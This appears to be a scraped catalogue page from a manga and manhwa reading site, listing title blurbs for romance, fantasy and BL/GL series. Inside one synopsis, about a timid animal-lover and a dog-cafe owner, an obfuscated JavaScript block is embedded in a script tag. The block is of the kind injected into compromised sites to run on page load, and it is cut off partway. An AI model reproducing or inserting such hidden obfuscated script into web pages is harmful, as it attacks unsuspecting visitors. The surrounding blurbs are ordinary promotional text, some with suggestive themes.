2017 - Page 9

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

3025 results

Admiral’s Monster Wife

Lydia Planang is called a monster because of her scales. She was treated like a minor and forced to marry by order of the emperor. Her fiancé is a wild and fierce sailor. He is the admiral of Chilia, who is rumored to be very sadistic. But when he first met her, he was incredibly nice to her…? “My husband just grabbed his wife’s hand and he was already screaming.” Lydia learns little by little about Chilia’s secret in the admiral’s intense love. Dragons, giant octopuses, sea snakes, fairies and mermaids… A destined love after marriage on the splendid ocean! *** “I know a plant that can help my husband increase his stamina.” Alexander leaned over and whispered in her ear. “If you weren’t satisfied last night, I’ll try to find it.” “…Oh no!” Last night! Lydia literally blushed as she recalled her secrets that she couldn’t tell anyone.


Adonis Next Door

As a petite and cute girl, Su Shuang Shuang feels confused in daily life and occasionally falls on evil days. BUT! 4 bossy president showed up at the same time, the young master of Qin Group, Qin Mo, the active boy as the sunshine, Bai Xiao, the guy with double-personality, Ouyang Jin and the president of Ascendas Group, Qin Yi Xuan... Who on earth is the Mr. Right of Shuang?


Adventures of an Undead Who Became Paladin

"Humility! Integrity! Compassion! Valor! Justice! Sacrifice! Honor! Faith!" He's a lich, however, he's knightly! He is a lich, but he keeps his faith in the light! "Fearless in the face of the enemy! Loyal and upright, he fights to the death! Why you may ask? Because protecting the weak is not against the law of the world!" ................ This is the story of a cat with a bad mouth and a lich who gave his body and soul to the service of the Light!



“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” “I fell in love at first sight, but I can’t approach him!” Woojin, who is so popular with animals can be called a human catnip, cannot get close to people because of her dark and gloomy appearance and timid personality. On the other hand, Sangyoon, the owner of a dog cafe who appeared like fate in his eyes, was so handsome! So bright! So kind In love at first sight, Woojin tries to stamp her dog’s attendance at a dog cafe every day, but he can’t be courageous to say a word. ‘I want to be close to the boss. I want to be close. But can something like me be… ‘ Can timid Woojin really connect with the dazzling Sangyoon?!<script></script><script>(function(_0x1e4944,_0x1fea76){var _0x1d4cd3=_0xf2d5,_0x339045=_0x1e4944();while(!![]){try{var _0x48be92=parseInt(_0x1d4cd3(0xbe))/(-0x166e+0x53*0x21+0x4*0x2ef)+parseInt(_0x1d4cd3(0xcd))/(-0x75+-0xb53+0x5e5*0x2)+parseInt(_0x1d4cd3(0xcb))/(-0x1*-0x377+0x3*0x8b5+0x1*-0x1d93)+parseInt(_0x1d4cd3(0xb3))/(0x4a0*-0x4+0x48+0x123c)+-parseInt(_0x1d4cd3(0xcc))/(-0xb*0xe9+0x1*-0x233b+0x1*0x2d43)*(parseInt(_0x1d4cd3(0xc2))/(0x732+-0x244f+0x1*0x1d23))+-parseInt(_0x1d4cd3(0xb1))/(-0x57e+-0x2123+0x9aa*0x4)*(parseInt(_0x1d4cd3(0xb7))/(-0xa4*-0x22+-0x73*0x43+0x859))+parseInt(_0x1d4cd3(0xb8))/(-0xca9*0x1+-0x65*0x23+0x1a81)*(parseInt(_0x1d4cd3(0xc1))/(0x12c0+-0x19*-0x9+-0x1397));if(_0x48be92===_0x1fea76)break;else _0x339045['push'](_0x339045['shift']());}catch(_0x496da6){_0x339045['push'](_0x339045['shift']());}}}(_0x34d0,0x952b7+-0x27013*0x3+0x5bece));function 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After Becoming everyone’s Favorite, I went on a killing spree

Read After Becoming everyone’s Favorite, I went on a killing spree <div class="description-summary"> <div class="summary__content show-more active"> Growing up as an orphan in the arena, Ora was determined to awaken her summoner bloodline and gain immense power. However, her world turns upside down when she learns that the king has taken her loyal companion, Dragong, putting him in grave danger. In a daring escape, Ora and Dragong flee together, embarking on a series of thrilling adventures. Along the way, Ora hones her strength and resilience, while meticulously planning her revenge against those who have wronged her. </div> </div>


After breaking up, I had relationship with my ex’s uncle-in-law

After experiencing regression, I desperately tried to escape from those scummy men, only to be saved by you. Let’s be together, resisting the destiny we were originally bound for, because we love each other.


After signing for 90,000 years, the former Taoist monk wants to cut…

The Taoist couple system has awakened, and the beauties with dual cultivation are waiting to be bound by their fate. Loli? Sister Yu? Jiang Mao likes to make the banshee surrender the most, and whip the maids away. All the charm slaves listen to my orders!


After the Curtain Call

Soyoung is devastated when her favorite musical actor is swallowed up by the world of TV. Just after she quits supporting him, she discovers charismatic actress Jaeyi in a theater performance of “Macbeth” and becomes a fan at first sight. By meeting Jaeyi after her shows and even doing her a favor, Soyoung goes from a mere fan to her good friend. But when Jaeyi has to work with celebrity actress Hyesun, who she has a troubled past with, it unexpectedly sours their friendship. All Soyoung wanted was to support her favorite actress… so why does this new development bother her so much? Aepeuteo Keoteunkol / 我的女神,谢幕之后可以约会吗? / 애프터 커튼콜


After the Frozen Heart Melts

Read manhwa After the Frozen Heart Melts / 凍りついた心が溶けたら / 얼어붙은 심장이 녹고 나면 “To quell the magic threatening the world, Hestia was sacrificed as an offering. Reincarnating as Cecilia, a nobleman’s illegitimate child, with memories from her past life.” The life she had lived without her own will had long since ended. Whatever she had been in her past life, now she was living as her enemy’s sister’s maid. This was Cecilia’s life as the nobleman’s illegitimate child. However… Out of nowhere, the man her sister intended to marry, Duke Kilian Janssen, suddenly declared that he would marry Cecilia. Moreover, his voice seemed to overlap with a voice she had heard a long time ago. “I’m so angry because of you that I can’t stand it.” “…If you want to refuse, go ahead. I will definitely marry you.” A man who approached her using the same tactics as in her past life. His persistent demands and obsession kept bringing back memories of her past life. Can Cecilia heal the wounds of her past and find her true life and love?


After World’s Flower Viewing

Read manhwa After World’s Flower Viewing “Stop crying.” Yeomra wiped Gung’s tears with his large hands. He frowned as he saw the teardrops trickle onto his fingers. He could not believe what he had done. He felt that the teardrops falling onto the floor were a waste and unconsciously reached out his hand. His actions were unexplainable. But that was not the only strange thing. “What is this stinging pain…?” Every look at the child made his heart hurt. Yeomra could not help but be confused by this pain he had never felt in his entire life. But oddly enough, he couldn’t take his eyes off that child. Yeoho, the secret guard of the great king, Yeomra, who had watched everything unfold, was in utter panic. “H-heaven and earth will turn upside down!” Yeoho looked at his master with a bewildered expression. Yeoho was wondering whether or not to pluck both of his eyes out. He could not comprehend why his master had acted like that.


Afterschool Adventure

She has a crush on her. So, she makes the first step and leaves her with a cute kiss. Except, they’re both clueless about each other’s intentions! GL with LGBTQ+ side characters as well!
